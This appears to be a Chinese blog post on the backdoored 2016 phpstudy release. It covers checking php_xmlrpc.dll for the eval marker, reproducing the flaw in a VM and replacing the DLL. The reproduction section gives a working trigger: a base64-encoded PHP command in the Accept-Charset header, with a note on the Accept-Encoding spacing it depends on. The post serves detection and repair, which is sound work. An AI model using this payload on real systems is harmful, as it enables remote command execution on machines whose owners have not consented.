自查phpstudy后门以及漏洞复现

事件描述

杭州公安在9月20日发布的杭州警方通报打击涉网违法犯罪暨“净网行动2019”专项行动战果中提到，2016年发布的phpstudy版本被不法分子恶意植入后门，犯罪嫌疑人在2019年初被公安机关抓获。其利用植入的后门非法控制计算机67万余台，非法获取账号密码类、聊天数据类、设备码类等数据10万余组。受影响的用户还是比较多的。

自查后门

在phpstudy文件中按以下目录查找\phpStudy1\php\php-5.4.45\ext\php_xmlrpc.dll文件
查找后如果发现@eval(%s(‘%s’))的字样，证明漏洞存在，如图所示
经测试发现2016版php-5.2.17、php-5.4.45版本均存在漏洞

漏洞复现

环境准备

环境：win7虚拟机+phpstudy2016版
直接使用php-5.4.45版本就可以

本机访问页面，可以正常访问并且引用了xmlrpc模块

漏洞利用

• 对访问的页面抓包
  注意箭头指向的gzip,deflate之间默认是有空格的，这是个雷区！！！
  

• 构造payload
  Accept-Charset:ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
  此时的gzip,deflate之间是没有空格的，有空格成功不了。
  Accept-Charset后边的参数就是要执行的命令进行base64编码（bp里就可以）
  这里执行的命令是echo system(“whoami”);
  

修复建议

更新到最新版本，或者去官网下载原始版本的php-5.2.17、php-5.4.45替换掉php_xmlrpc.dll（下载完之后记得对照MD5）